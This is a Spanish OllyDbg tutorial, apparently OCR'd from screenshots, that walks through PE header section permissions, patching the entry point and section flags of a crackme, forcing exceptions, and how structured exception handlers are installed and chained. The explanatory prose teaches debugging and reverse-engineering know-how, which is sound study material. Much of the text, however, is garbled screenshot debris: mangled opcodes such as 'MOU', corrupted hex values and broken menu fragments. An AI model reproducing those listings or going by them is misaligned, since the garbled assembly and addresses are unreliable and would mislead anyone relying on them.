Esto lo vimos cuando explicamos la sentencia MOV, en este caso 401057 tiene solo permiso de lectura y 
ejecución, pero no de escritura, por lo tanto al escribir en dicha posición de memoria dará excepcion, 
apretemos f8. 


Las secciones tienen permisos iniciales, que están guardados en el header, hasta que el programa no los 
cambie mientras corre con alguna api como por ejemplo VirtualProtect que sirve para cambiar permisos 
en tiempo de ejecución, tendrá el permiso inicial. 


Donde podemos ver los permisos iniciales de cada sección y modificarlos si queremos en el OLLYDBG? 


Vayamos a ver las secciones apretando el botón M 


A ooo) 
Options Window Help 


RD_PTR DS: [461057],EAX 
E PTR DS: [EAX],AL 
RD PTR DS: [4020CA7,ERXx 


r Title = NULL 
A A al o rá vw] rs rr 
50300000 | 00BB4BDA Priv! Ru Ru 
90300000 | 0OBA30Da Map |R R 
BO3E0000 | 0OBBIBBA Priv! Ru Ru 
BO3F0000| OOBBZ2000 Map |R R 
Imag R RWE 
code Imag|R RUE 
60402000 | 009061000| CRACKME | DATA data Imag|R RWE 
50403000 | 009061000| CRACKME |. idata imports Imag|R RWE 
600404000 | 000601000| CRACKME | .edata |exports Imag|R RUE 
60405000 / 006061000| CRACKME | .reloc |relocations| Imag|R RWE 
60406000 | 00662000 | CRACKME | .rsro Tesouroes Imag|R RWE 
90410000 | OOBBSODa Map [RE RE 
90400000 | 00BB2000 Map ¡RE RE 
B04E0000/| 00103000 Map |R R 
MATCTanana! Mat añada PA a mn E 


Mew ic 


Vemos que la sección que empieza en 400000 o sea la primera realmente es el PE HEADER, es una 
pequeña sección de 1000 bytes que guarda los datos de las secciones, nombres, largo, todo sobre el 


archivo para arrancarlo. 


Por supuesto el PEHEADER se puede editar con cuidado y siempre en una copia del archivo ya que si 


metemos mal la mano el programa no arrancara. 


Veamos en el dump el header 


View executable file le 
E 


Copy to executable file EBodeal hoc 


Caj 
Y Hex 
Text 
Short 


Long 

Float 
Disassemble 
Special 


Appearance 


al 

bo 00 bb 60 6b 
ls] 
bo 00 60 00 6n 


Ahora el OLLYDBG tiene una opción para interpretar mejor los parámetros del header, haciendo en el 
dump, click derecho. 


00 06 0n 00 08 000 
00 69 06 60 00 00 
00 00 00 60 01 60 A 
Backup 

Search for 


Go to 


¡ Y Hex 

Text 

Short 

Long 

Float 
Disassemble 


Mn rr mm 


DOSIS 


DOE 


DOS EXE Signature 
56 


DOS_PartPag = (86.) 
DOS_PageClnt = 
DOS_ReloCnt = MB 
DOS_HdrSize = 4 
DOS_MinMem = F (15.1) 
DOS_MaxMem = FFFF (65535. ) 
DOS_Reloss = 

DOS_ExeSsP = 
DOS_ChkSum = 
DOS_ExeIP = 6 
DOS_ReloCs = BM 
DOS_TablOfFf 
DOS_Over lay 


= 40 
= 1A 


Si vamos bajando lo primero que hallamos es el offset a la PE SIGNATURE que es un valor que nos dice 
donde esta ubicada en el Header la información realmente, vemos que el puntero es 100, así que debemos 
sumarle los 400000 del inicio del header y nos dará 400100, bajemos hasta allí. 


9n4BBaFE 


pan6 

BAD92429 
sl215 15151512] 
s/s15]515]515) 


2924090 
15]515]51515]515] 
ls ls 12151515] 


a 
s/s1s1511515) 
002200 
5Js/s15]515]515] 
00061000 
00061006 
00002000 
00400000 
000981000 
p0BBB20b 
posi 


9 

55 [15151515] 
BO220000 
Js] /s15151515] 
60100000 
5901090000 
D0200000 
00004006 
901090000 
0020000 
B100 


004050145 


Command EE wl | 


achine = ACHINE_1386 
NumberOfSections = 6 


TimeDateStamp = AD92429 
PointerToSymbolTab le =B 
NumberOfSymbols = BM 

SizeO0fOpt ionalHeader = Eb 
Characteristics = EMECUTABLÉ IMAGE! 32BIT_MF 
MagicMNumber = PE32 
MajorLinkerVersion = 2 
MinorLinkerVersion = 19 (25.) 
SizeDfCode = 666 (1536.) 
SizeO0fInitializedData = 2200 (8704,) 
SizeO0fUninitializedData = 4 


DOSODOOS 


AddressOfEntryPoint = 1000 
BaseO0fCode = 1000 
BaseOfData = 2000 
ImageBase = 400000 

Sect ionAlignment = 1000 
FileAlignment = 208 
MajorOSVersion_= 1 


Como vemos no estábamos equivocados, aquí empieza la info importante sobre el programa. 


Ya explicaremos mas detalladamente muchos de estos valores solo mencionemos al pasar 


yUvNDuUnU 
0220000 


vu 5SizeUutLode = 644 11536. 


2 lze0t In l+ Lal ExecData = "2290 (8704.) 


aseD E 
BasedíData = 2000 
ImageBase = 400000 . 


BO0200000 
00004000 


DD 90400090 


O sea ese puntero que es 1000 le sumamos los 400000 y tenemos el entry point del programa, si lo 
queremos cambiar, por ejemplo a 2000, hacemos click derecho 


A IS 


PUSH 0 Binary 


CALL _<JMP. £)SE 

MOU DWORD PTR 

21 MOU DWORD PTR 
251 MOU DWORD PTR  L : 


21 MOU DWORD PTR abel y 
CALL <JMP. 2.USE 


door 


cazo4an PUSH DuoRO PTE old for 

Find references CtrHR 
View executable file 

Copy to executable file 


Go to 
Hex 
Text 
Short 
0605 6006 
2924090 BADIZ429 Long 
cl 60660000 GO0000aGÓ Float 
Ol 00BBBBBA O0BB0BBA Da 
4| E000 OBEO , 
él SES1 818€ Disassemble 
Sl 0BB1 6108 
Al 02 92 Y Special 
El 19 13 
la 
00000BBa BO00000n Appearance 
00100000 00001000 = 
00100000 00001000 Base0fCode = 1000 
00200000 B0DB2000 BaseDfData = 2008 
VACACALAA TALALA TACAATACACALALA Tan=anDrrna — 


Y podemos escribir el valor que queramos por ejemplo si queremos que el programa empiece de 402000, 
escribiremos allí 2000 ya que siempre hay que restarle la imagebase 400000 o sea donde realmente 
empieza el header que es la primera sección del programa. 


Hexadecimal 


Signed 


Unsigned 


coc 


Luego para que quede definitivo guardado en el archivo, hacemos CLICK DERECHO-COPY TO 
EXECUTABLE y en la ventana que aparece CLICK DERECHO - SAVE FILE como guardamos los 
cambios normalmente, igual esto no lo haremos ahora solo quería mostrar otra posibilidad. 


Bueno sigamos bajando en el header 


60100000 001006 suelas 3 L0Bb 13095. J 


40100000 560001000 
(9/5/5/35151515] 19JaJJ51519515] SizeO0fRawData = 606 (1536.) 
(5/5/5/35]5]5]5] 19J5]51515/3515] PointerToRawData = 600 

(9lolsJ5Js]515]5] 19JaJsJ5]5]51515] PointerToRelocations = BM 
(s1s]515/5]51515] 1alsls [515151515] PointerToLineNumbers = 6 
all) NumberOfRe locations = A 


[slalsls] 
20000060 


Allí empiezan los datos de las secciones vemos que la sección que comenzara en la posición de memoria 
1000 o sea 401000, y su características son CODE, EXECUTE, READ. 


Si quisiéramos que esta sección tuviera permiso de escritura deberíamos cambiar ese 60000020 por 
E0000020 que es el valor que deja la sección con permiso para todo, jeje, probemos. 


Modify dword ... 
Hexadecimal [£0000020 
Signed [-536870880 | 
Unsigned [375809641 6 


jajajalalalalala] UD DUDUDIDO REeServeoa 

606000009  |D0D 6000000a Reserved 

43 4F 44 41 ASCII ”CODE” SECTION 

66106000 ¡DD B6BB1ODO VirtualSize = 1000 OS J 
ó6B16000a |DD 66BB1ODO VirtualAddress = 1000 
60060009 |DD 40BBB6On SizeO0fRawData = 600 (1536.) 
9js15[95]5]5]5] masia ls 151511515) PointerToRawData = 600 
(5/51515/5]5]5]5] mus ls15151515]515) PointerToRelocations = BM 
6606000098 |DD B0BBBBAn PointerToLineNumbers = MB 
[slalsls] DW 6008 NumberOfRe locations = 5 
[s]s]5]5] 111045151515] NumberOfLineNumbers = 
2000000 — (0D EOOBBOZO Characteristics = cone: EXECUTE ¡READ WRITE 
44 41 54 4 ASCII "DATA” SECTION 

66166000 ¡0D 6O6BB1ODO VirtualSize = 1000 (4096, ) 
66200000 |DD 60BBZ2000 VirtualAddress = 2000 
66620000 |DD BOBBBBZ0n Size0fRawData = 200 (S512.) 


Ahora guardamos los cambios con el procedimiento usual 


Find references CtrHR 
View executable file 


6 
F 


10000]=77? Copy to executable file 


00000009 [DD BBBBBAl Hex 
60000000 [DD BOBBBA 
asaasads [DO BASA — Tayt 


gsgas60s [DD essaaali Short 
ose0B00a [DD BaBBaa 
saase990 | DD gaguVal Long 
ooB000Ba [DD BBB0Ba 
43 4F 44 4l ASCII "col Float 
ob10006a [DD aamaÍa 

deleobos [DD abeclal Disassemble 


00 aaa Y Special 

DO 009004 - — 
6098 

W 6088 Appearance 
EO00Ba.. 


1] 
41 4/|ASCII ”DATA” 
aaranaaa NN ARARIALA 


CTIÓON 
MistasiSiza — 1M6AR (An 


¡20000 19JaJaJ5]5p15]5] SizeO0fRawData = 200 
ICOBBa BuBBaCOD PointerToRawData = ( 
100006 1alsls[s1515]515] PointerToRelocat ion: 


¡BBBaa 15J5]5]51515]515) PointerToL ineNumber: 

pjalz] NumberOfRe locat ¡ons 
Backup » 
D 00001990 

<< 
AA 

ig6866 | Db BaBBBaRS Modify integer 

| 

18 DW 0008 Search for » 

20|WindowStat ¡on El 

238|WindowStat ¡on 3 


Go to offset “CtrHG 


Guardar en: | () 01-Crackme rl + (100 Er 
A CRACKME2.EXE 
y CRACKME.EXE 
Documentos 
recientes 
Escritorio 


Mis documentos 


Mis sitios de red Nombre: 
Tipo: Executable file (*. exe] 5e Cancelar 


Le cambiare el nombre a CRACKME 3 para saber que este es el que modifique. 


lis sitios de red Nombre: [CRACKME 3.EXE 
Tipo: [Executable file [exe] 
A TR - 


Ahora busquemos ese crackme 3 y abrámoselo en OLLYDBG 


Buscar en: | (5 01-Crackme 


[5] CRACKMEZ.EXE 
IE 3.EXE 


Fecha de í 
Tamaño: : 


Nombre: [CRACKME 3.EXE 


Search for 
Go to » 


4 Hex¿ASCI Ns sb 
Text » ( 
Short » Hex/UNICODE e q 
Long »|  Hex/UNICODE (8 bytes) 
» 


Float ñ 
Disassemble 


Volvamos a la visualización normal del dump 


Probemos ahora la instrucción que hicimos antes 


e A A A A O E) = A 


Apretemos F8 


Vemos que no se produjo excepción y guardo el valor de EAX en el contenido de 401057 perfectamente. 


Otro tipo de excepción es 
División entre 0: Se produce cuando se intenta dividir un número con 0. 
Por ejemplo escribo en OLLYDBG 


ECEROOE Ea E 


U ECX 
Es FFO40000 CALL <JMP. ¿KERNEL32. GetModu l 
ES poen+aDa IR PTR DS: [4020CA],EA 


¿MO Pannanana mint ORAR ARANA A 


Eso dividira ECX por EAX, si EAX es cero se producirá una excepción. 


R 
EAS 
E 
E 
E 
ES 
EE 
ES 
E 
E 
Cc 


¡DA TD mn DD) 


) 


Apreto f8 


Command y| 


Access violation when writing to [00000000] - use Shift+F?/F8¿F9 to pass exception to program 


No siempre OLLYDBG aclara bien las excepciones, no me dice que fue una división por cero, pero salto 


la excepción. 


Instrucción mo valida intento de ejecución de instrucción privilegiada: Se produce cuando el 
procesador intenta ejecutar una instrucción que no pertenece a su juego de instrucciones, es decir al 


encontrar un código de operación desconocido 

Eso no lo podemos probar porque OLLYDBG no nos deja escribir instrucciones que no existen para el 
procesador, pero el programador puede haber deslizado alguna instrucción inválida que no corresponde al 
juego de instrucciones que el procesador puede interpretar y lógico dará error al no saber que hacer. 

La otra muy conocida es el INT 3 que provoca una excepción y es usada por el debugger cuando ponemos 


un BPX común para detener el programa y tomar el mando del mismo en el momento que se ejecuta el 
INT 3. 


También algunos programas colocan INT 3 directamente escribiendo la sentencia, lo cual es una 
excepción más de todas las posibles. 
Hay muchísimas excepciones por supuesto no veremos todas esto es un simple ejemplo. 


Ahora sabemos que en el programa se pueden producir excepciones, pero que ocurre cuando se genera 
una, veamos el siguiente esquema. 


DEPURADOR KERNEL 


SISTEMA 


¿TENEMOS SER? 


Aquí hay un grafico que le afanamos al tute de SILVER, allí vemos que al producirse una excepción, lo 
primero que ve el sistema es si el proceso esta siendo debuggeado. 


En el caso que este siendo debuggeado, toma el control el DEBUGGER O DEPURADOR el cual en la 
imagen vemos que vemos que puede controlar la excepción o no, casi siempre CONTROLA LA 
EXCEPCION, y en el caso del OLLYDBG se fija si esta puesta la tilde en DEBUGGING OPTIONS- 
EXCEPTIONS para saltear ese tipo de excepción con lo cual si esta marcada, le devuelve el control al 
programa, de no estar la tilde espera que apretes SHIFT mas f9 para devolver el control al programa, o 
sea allí en el grafico donde dice CONTROLA LA EXCEPCION-SI, falta que una vez que toma por ese 
camino decide parar o continuar según haya tilde o no, y luego continua según la imagen de abajo. 


DEPURADOR KERNEL 
SISTEMA 


¿TENEMOS SEH? 


Allí vemos el trabajo completo, luego de CONTROLAR LA EXCEPCION decide si para o continua si 
esta la tilde o no, si para, espera que apretes SHIFT mas F9 para volver donde muestra la flecha roja que 
agregue, y si no para, vuelve adonde muestra la flecha roja directamente. 


Allí vemos que cuando retorna del OLLYDBG pregunta si tenemos SEH instalado, si tenemos va a el, y 
si no va al SEH genérico, expliquemos un poco esto que parece difícil pero no lo es. 


QUE ES EL SEH 


El SEH o Structured Exception Handling (Manejo Estructurado de Excepciones), es una manejador que 
se instala para poder recuperar a un programa de un error, ya que si no tenemos instalado un SEH propio, 
al encontrar un ERROR, se ejecuta el SEH GENERICO del sistema que en un 90% de los casos termina 
en el cartel que nos muestra que ha habido un error en la aplicación y se debe cerrar el programa y chau. 
Con nuestro propio SEH, podemos interceptar un error, arreglarlo, y volver al programa y que continúe 
corriendo sin que salga el molesto cartel del sistema y nos cierre la aplicación. 

También debemos decir que aunque aun no hemos visto que son los threads a fondo, una mínima 
definición de threads es que son hilos del programa o partes que se pueden ejecutar simultáneamente, 
hago esta definición porque cada thread tiene su propio manejo de excepciones, si a un thread le colocas 
un manejador de excepciones solo funcionara en el thread que fue colocado y no en los otros. 


Como se coloca un Manejador de excepciones 


Bueno veamos el crackme de cruehead nuevamente en el stack vemos 


RETURN _t el32.7C816D4F 
ntdll.7C 


CRACKME_.<Modu leEntryPoint > 


Ese es el SEH GENERICO que instala el sistema, mientras no se instale uno propio, cualquier error ira 
directo a este manejador que nos lleva casi siempre, al fatídico cartelito de error, veamos la ubicación de 
los punteros del SEH GENERICO. 


Como habíamos visto que en FS :[0] estaba el puntero al manejador de excepciones que esta vigente, 
podemos ir en el dump allí, también mirando en OLLYDBG 


' ?COTEE94 
q 2 FFDEGO0 


ntdll.KiFastSystemCal lRet 


3 ntdll.7C ; 
S CRACKME_. 004015005 
bit BLFFFFFFFF) 
bit BIFFFFFFFF) 
it BÍFFFFFFFF) 
it O J 
Bit 7EFDDOROFFF) 


A NULL 
rr celda dad deci (BOBBBO7E) 


BD empty 
empty B. 


empty B.B 
5 empty 
6 empty 1.0 


ET? ormmtu 1 


YFFDDGGb 
7FFDDOOS 
7FFDOG10 
YFFDOB1S 
TFFDDO 
YFFDDO 
7FFDOO 
7FFDDOSS 
TFFDDO4D 
YFFDDO4S 
7FFDDOSO 
7FFDDOSS 
TFFDOO 
7FFDDB6S 
YFFDOO 

ZEFONAZAIL AA AA CAR CAR AA AA AA AA. 


EA 


15] 


Bobe. 


Como habíamos visto Fs:[0] es el contenido de la dirección de memoria que me marca el OLLYDBG 
puede variar en cada maquina, pero en la mía es entonces FS: [0] es 12ffe0 


ntdll.7C920738 


G| CRACKME_.<Modu leEntryPoint> 


Como vemos en el stack 12ffe0 apunta al final de la cadena de manejadores, o sea al manejador que se 
encuentra en funcionamiento en este thread actualmente, una posición mas abajo esta la dirección donde 


saltara al encontrar una excepción, es este caso como es el manejador genérico saltara a una dirección del 
sistema que terminara mostrándonos el famoso cartelito de error. 


Log Alte 

Executable modules ¿Alt+ 

Memory Alt 

Heap 

Threads 

Windows 

Handles 

CPU Alte 
| Patches Ctl+ 


Y si vamos a VIEW-SEH CHAIN 


A NN 
5] File View Debug EOS punt Window Help 


Vemos la dirección del manejador genérico que es el único instalado, si hubiera aquí mas de uno, el que 
funciona al encontrar una excepción es el superior de toda la lista. 


Ya que el crackme de cruehead no instala manejadores de excepción propios, utilizaremos un programita 
llamado SMARTMOUSE que adjunto al tutorial. 


Lo arranco en OLLYDBG 


[c] File View Debug Plugins ali Window Help 


PUSH_EBP 

MOU EBP,ESP 

PUSH -1 

PUSH smartmou. 00400160 


EDI 
MOU DWORD _PTR SS: [EBP-18],ESP 


kerne 132. GetVersion 
XOR EDX, EDx 
- (MOV DL-BH ___ 


Ali nomás veo que al inicio el programa va a instalar su manejador de excepciones propio, OLLYDBG 
nos lo indica en el comentario. 


Como se hace esto traceemos y expliquémoslo paso a paso. 


PAS AJO PAS AE AT 2 E E E E E E E E O E A O 00 


00404AF 1 


PUSH_EBP 
MOU EBP,ESP 
PUSH -1 

PUSH smartmou. 90400160 
PUSH_smartmou. 90406608 
MOV EAX, DWORD PTR FS: [6] 
PUSH_EAX 

MOU DWORD _PTR FS:[M7,ESP 
SUB ESP,58 


SE handler installation 


100404B595 
B0404B06 
DO0404B07 


00404817 6400400 


00494810 


¿0R EDX, EDX 


a a 


Llegamos traceando a la instrucción que el OLLYDBG nos indica que empieza la instalación del 
manejador de excepciones, lo primero es hacer un PUSH con la dirección a la cual queremos que salte el 
programa, cuando halle una excepción, en este caso, será 4066d8, ejecutamos el push. 


| RETURN ES 
ntdll.7C9 


207 


FlEnd of SEH chain 
SE handle 
kerne 132, 70816058 


als F1| smartmou.<Modu leEntryPoint 
lalslels [21512] 


Allí coloco la dirección en el stack 


B0404AF6 63 6014005 | PUSH smartmou. 00400160 

1B0404AFB 68 D 4006 |PUSH_smartmou. 60406608 SE handler installation 
2 641 0000601 MOU EAX, DWORD PTR FS: [0] 

100404BD6 50 

B0404B57 |]. 64: 50661 MOU DWORD _PTR FS: [61,ESP 

00404BBE ||. SUB ESP,58 

p0404B11||. 


DIUICuU ECT 


AAA TAA DA 


La siguiente línea mueve el valor actual de fs : [0] a EAX vayamos a ver cuanto vale Fs [0] en el dump 


(515151=T27=75]+] 
BO12FFBO 
EDxX 7C91EB94 
EBX 7FFOFOG6 
ESP 0B12FFE4 
EBP 0B12FFCO 
ESI FFFFFFFF 
EDI 7C920738 


EIP 004048090 


ntdll.KiFastSystemCallRet 


ntdll.7C920738 
smartmou. 00404800 


=|C1 ES 0023 32bit O(FFFFFFFF) 
PO CS 001B 32bit B(FFFFFFFF) 
ABD SS 0623 32bit O(FFFFFFFF) 
Zz 6 DS 60023 32bit 
S1 FS 003B 32bit 
al a GS 0006 NULL 
DO  LastErr ERROR_MOD_MOT_FOUND (60909 
EFL 00000283 (NO,B,NE,BE,S,PO,L,LE) 
STO empty —-UNORM BCEG 01050104 0OBABADa 
STi empty 6.0 
ST2 empty 6.0 
ST3 empty 6.0 
ST4 empty 0.0 
STS empty 0.0 
ST6 empty 1. 0000000000000DOBBDA 
ST? empty 1 


7FFDEG10 
7FFDEGÍ 


u 


[Am 


A DA 


H(MTFDD 


Q12FFBD 
91€B94 ntdl l.K 
FFOFO99 


. D000000BBBAABBABBDA 


3210 ESPUODZ 


eel 
1838700: 
30..EX.. 


nt... 


BBs 


ntdll.? 


EIP 00404806 smartmo 


ano. 


JD 


Movió a EAX ese valor 


Ahora hace un PUSH con ese valor 


A04B66D3 
0040C160 
FFFFFFFF 
DO12FFFO 
7C816D4F 
70920738 


Entry address 
smartmou. 00400160 


RETURN _ to kernel32 
ntdll.7C920738 


End of SEH chain 
SE handler 
kerne132.7C316D58 


TCS399F3 
rcs16058 
5151515]515151% 
00000005 
0000000B 
00404AF1 
1alala1515151515] 


BO12FFEC 
BO12FFFO 
BB12FFF4 
BB12FFFS 
BB12FFFC 


smartmou. <Modu LeEn 


Vemos porque se le dice SEH CHAIN que significa cadena ya que este valor que guardo, apunta al 


manejador anterior que por ahora esta activo. 


DUITOTRT DO > 


00404500 
O4O4ED6 
A4n4nd4BR? 
BB4B4EDE 
00404B11 
pO404B12 
0B404B13 
00404B14 


. DO LODOTUUU Frusn amas LIIUAM . DUMUDOOLO 


. 6£4:A1 B000001 MOU EAX, DWORD PTR FS: [6] 
50 PUSH_EAXx 


33EC 58 
53 
56 
57 
3965 ES 


PUSH EBX 
PUSH ESI 
PUSH_EDI 
MOU_OWORD_PTR_SS: [EBP-18],ESP 


EUA h 


La ultima línea cambia fs:[0], le coloca el valor de ESP o sea apunta a donde esta ubicada esta estructura 


nueva que escribimos 


EAX BB12FFEG 
ECX BO12FFBO 
EDX 7C91EB94 ntc 
EBX ?FFOFOGa 
ESP 


EST FFFPPFFP 
EDI 7C920738 ntc 
EIP 00404807 sma 


C 1 ES 0023 32t 
PO CS 001B 32t 
AMA SS AR?Z 22 


AB1I2FFBS' sMartmou . 
fOb12FFBC FFFFFFFF 
BB12FFCO| BB12FFFO 
BB12FFC4| 7CS16D4F| RETURN to ke: 
BB12FFCS| 7C920738|ntdll.7C9207: 
BB12FFCC| FEFFFFFF 
B612FFDO| 7FFOFOGO 
Bb12FFD4| 30544938 
BB12FFDS| BB12FFCS 
BB12FFDC| 84E30918 
BB12FFEO| FFFFFFFF|End of SEH cl 
BB12FFE4| 7C8399F3|SE handler 
BB12FFES| 7CS816058| kernel32.7C8 
OB12FFEC| BOBBBaDa 
OB12FFFO| BOBBaaDa 
Bu12FFF4| BOBBBODO 
BO12FFFS| 00404AF1| smartmou. <Mos 
BB12FFFC| BOBBBaDa 


Al ejecutar la línea 


smartmou.<Modu leEntryPoint>+10D 


Tenemos nuestro manejador instalado en 12ffb0, como siempre vemos que fs:[0] queda apuntando al 
manejador actual 


Ssmartmou.t 


YA12 RETURN_to ke 
BO12FFCS| 7C Xd ntdll.7C9207 
BB12FFCC 


End of SEH chain 
SE handler 
kerne132.7C816058 


smartmou.<Modu leEntryPoint > 


OO12FFFC]| BO0BaBaaa 


El cual OLLYDBG nos indica que es un SEH, el primer valor apunta al viejo SEH, y el segundo valor es 
la dirección que cuando halle una excepción el programa saltara a tratar de arreglar las cosas. 


O sea que cuando ocurra una excepción en este ejemplo 


DEPURADOR KERNE 


SISTEMA 


El sistema le dará control al debugger el cual parara o no según este la tilde de ese tipo de excepción 
marcada, y volverá al programa, directamente o apretando SHIFT +f9, adonde muestra el dibujo y como 
ahora tenemos SEH instalado, pues continuara en 4066d8. 


Si vemos el menú SEH CHAIN ahora 


Vemos que quedo como manejador activo el que instalamos y el genérico quedo debajo sin funcionar. 


Forcemos una excepción en el programa 


Ls] ru vISvY LED US PLA TS VU IU nep 


$02] COTO (PE PARIO 50 


PUSH 
B04B4AF2 Spec mou ESP, esp 
0404AF 6A FF PUSH -1 
z 68 60014909 [PUSH smartmou. 90490160 
683 DS664000 | PUSH_smartmou. 00406608 SE handler in 
64:A1 0000001 MOV EAX, DWORD PTR FS: [6] 


50 US 

64:3925 60901 MOU DWORD _PTR FS:[0],ESP 
3EC 58 SUB ESP,S58 

PUSH EBX 

PUSH ESI 

PUSH EDI 

MOU DWORD _PTR SS: [EBP-18],ESP 

Al) a: ¿EDX 

este 38D54201 MOV DWORD pa DS: [420538], EDX 


MOU ECX,EA 
Í FFOG000 AND ECx, Dee 
34054201 MOU DWORD PTR DS: [42D534],ECX 
103 SHL ECx,8 
ADD ECx, EDX 
MOU DWORD _PTR DS: [420530], ECX 
SHR FOY 14 


65 ES 
z 64004001 kerne 132. GetU 


CA 
30054201 
2 1a 


on4B4B14|]. 38965 ES MOU DWORD_PTR_SS: [EBP-18],ESP 

00404617||. ke 
00404B1D||. 33D2 XOR EDX,EDX 

00404B1F|| . 8AD4 MOU DL, AH 

BO4B4B21 3915 00000081 MOV DWORD PTR DS: [6],EDX 

0040 . 8BC8 MOU ECX,EAX 

a . $S1E1 FFOBGGOÍ AND ECX, OFF e 
a . 290D 34054201 MOU DWORD PTR DS: [42D534],ECX 

A riF1 as E 


Lo cual dará error pues no se puede escribir en la dirección 0. 
Quitemos todas las tildes en debugging option-exceptions, salvo la 1ra. 


3 Debugging options [X] 


Commands | Disasm | CPU |] Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 
Security | Debug | Events — Exceptions | Trace | SFX | Strings | Addresses | 


[Y Ignore memory access violations in KERNEL32 
Ignore (pass to program) following exceptions: 
[INTI breaks 
T” Single-step break. 
T Memory access violation 
T Integer division by O 
T Invalid or privileged instruction 
T” ANFPU exceptions 
[7 Ignore also following custom exceptions or ranges: 


DEEDFADE 
CO00001E (INVALID LOCK SEQUENCE) 


Add range 
Delete selection 
El Undo Cancel 


Demos RUN 


+ 33D2 XOR HA AS 
.«  3AD4 MOU DL,A 
8915 mou DUÓRD PTR DS: [07,EDX 


. 8BC8 Hou EC, EA 
- S1El FFODO90Í AND E 

: 8S6b Sabsazal MOU DUORD PTR DS: [420534], ECX 
. C1E1 08 SHL ECX,8 


ARA ar ma 


B3 2£ SF 2 


24] 303< 


Command y] 


Access violation when writing to [OOOOOODO] - use Shift+F?¿FS/F9 to pass exception to program 


Entonces según lo que vimos el programa debería ahora continuar ejecutándose en el manejador para 
tratar de recuperar el error. 


El manejador estaba en 4066d8 vayamos allí y pongamos un BP, 


ma Y mevvr IS ds puna Y A A 


ECON m/T]wjH]c[/]k/B]R]]s] ¿538 * 


mod" ESP. ESP 
UB ESP,S 


CLD 
MOU EBX, DWORD PTR SS: CEBP+CJ 
8 MOU_EAX, DWORD_PTR SS: [EBP+8] 
04 6001 TEST DWORD PTR DS: [EAX+41,6 

JNZ smartmou. 00406778 


iS 
MOU DWORD PTR SS: [EBP-8],EAXx 
18 mou EAX, DWORD P PTR. SS:  CEBP+10] 


Como vemos OLLYDBG siempre nos aclara todo jeje, apretemos SHIFT + f9 para pasar la excepción 


A A 


Structured exception handler 


PUSH_EBP 
MOU EBP,ESP 
SUB ESP,S 


CLD 
MOU EBX, DWORD PTR SS: [EBP+C] 
8B45 88 _.._./MOY_EAX.DWORD_PTR SS: [EBP+8] 


.. +... . . . . dr 


Como vemos paro en el manejador, veremos que hace el mismo y si es capaz de recuperarse de un error 
tan grave ya que altere el código del programa para generarlo. 


smarímouse111.exe 


smartmouse111.exe ha detectado un problema y debe ER 
cerrarse. AS 


Si está en pleno proceso, puede perderse la información con la que esté 
trabajando. 


Informe a Microsoft de este problema. 


Se ha creado un informe de errores que puede enviarnos. Lo 
consideraremos como confidencial y anónimo. 


Para ver los datos que contiene este informe de errores, haga clic aquí. 


Enviar informes de errores | No enviar 


Vemos que no pudo continuar y salto al manejador genérico 


DEPURADOR KERNEL 


SISTEMA 


¿TENEMOS SEH? 


SEH THREAD 


Ocurrió este caso como el error es muy grave no lo pudo recuperar y salto al manejador genérico que saco 
el cartel fatídico y cierra el programa. 


Obviamente el manejador de excepciones esta diseñado para otro tipo de excepciones las cuales espera, 
no esta que es una alteración del código lisa y llana, pero vemos igual como funciona en el caso de no 
controlar la excepción. 


Para ver la otra rama del grafico que es cuando un manejador controla las excepciones en forma exitosa, 
veamos este crackme SDUE que adjunto. 


Lo arranco en OLLYDBG y veo que esta empacado por el mensaje del OLLYDBG de puede ser 
automodificable etc etc. 


[e] de View Debug Plugins SIETE Window Help 


CMP AL, BC? 
FIADD WORD _PTR DS: [EBX+13503AA0] 


3C C? 
DES3 AB3ASB1S 
pS CHPS, BYTE _PTR DS: LES1,8YTE_PTR_ES: [EDI 


AA Anar 


Quito todas las marcas en debugging options- exceptions, menos la 1ra 


FS Debugging options X 


Commands | Disasm | CPU | Registers | Stack | Analysis 1 l Analysis 2 | Analysis 3 
Security | Debug | Events — Exceptions | Trace | SFX | Stings | Addresses 


[Y Ignore memory access violations in KERNEL32 
Ignore (pass to program) following exceptions: 

T INT3 breaks 

T Single-step break. 

Memory access violation 

Integer division by O 

Invalid or privileged instruction 

TT ANFPU exceptions 


7 Ignore also following custom exceptions or ranges: 


DEEDFADE dd lastexcen 
CODOO01E (INVALID LOCK SEQUENCE) 
Add range 
Delete selection 


E Undo Cancel 


Y doy RUN 


[c] File View Debug Plugins Options Window Help 


CEEB Eran pit] $10 +] +] 1]elmitiwjn[c] 


EAX],ERX 


ES C4SFOSOO PUSH_58F64 
15151515] ADD BYTE PTR DS: [EAXI, AL 
DOEB ADD BL,CH 


B2ES ADD CH, AL 
aca An ON MARA PTR NS=-TFOY+E21 FRY 


Vemos que para en una excepción veamos 
Command y| | 


e violation when writing to [OOOO0000] - use Shift+F7?.F8/F9 to pass exception to program 


Donde se encuentra el manejador 


AAA AE AA AA AOS AE ASIA 


Address |SE handler 
Bb12FF9B 
0012FFEO| kernel32.7C03399F3 


En sus maquinas esta dirección puede variar ya que es una sección creada mientras se ejecuta el 


programa. 


Pongamos un BP alli 


Enter expression to follow 


[0dd0054| Y 
Cancel | 


mx] PH] vis: $0: 9] + LJEJM 
68 SDBBDDOS PUSH _BDDB65D 
FFa424 INC DWORD PTR SS: [ESP] 


c3 
ES OS mou Il 


A INC DWORD PTR SS: [ESP] 
BC 8B44240C MOU ESP, 0C24448B 


vw EB B1 
8683 S80B85000 |XCHG BYTE PTR DS: CEBx+B886], AL 
BoB2 ADD EYTE_PTR DS: [EDXJI,AL 

«IMP SHNRT AANNARRA 


lae FR 10 


Apretemos SHIFT mas f9 


Mu rue VIV DL Pag to e VY II IL n= 


4 x] et] vie] $0] 1] + Ljelmit[wjn]: 


68 S5DB0DDOS PUSH _6DD605D 
JGDDOBS9| FFO424 INC DWORD PTR SS: [ESP] 


c3 RETN 
EC gp44240c MOU ESP,0C24448B 
3683 S0BS30000 | XCHG_BYTE_PTR_DS: [EBX+B380], AL 


Para en el manejador, el cual debe retornar si no hace cambios raros a la línea siguiente de donde se 
provoco la excepción para continuar el programa. 


— a =a , , 
mdd x] e Jn] misil $00] 0] + ujejmit]wjH]e 
3100 FOR DWORD PTR DS: CERAX],EAX 

“Té éáorosoo PUSH_53F64 


ADD BYTE PTR DS: [EAX], AL 
ADD BL,CH 


GRANMA onñ HA al 


Pongo UN BP en la línea siguiente donde se genero al excepción y doy RUN 


A Ll =>— ==> 3 M5 M0 09 9 89 1 


Um R_ DS: CEAXJ,EAX 
ABDDBBAL tp C4aFOsOo PUSH_538F64 
B0DDABAS 000 ADD BYTE PTR DS: [EAX], AL 


AANNARAOS AARFR onn Al 


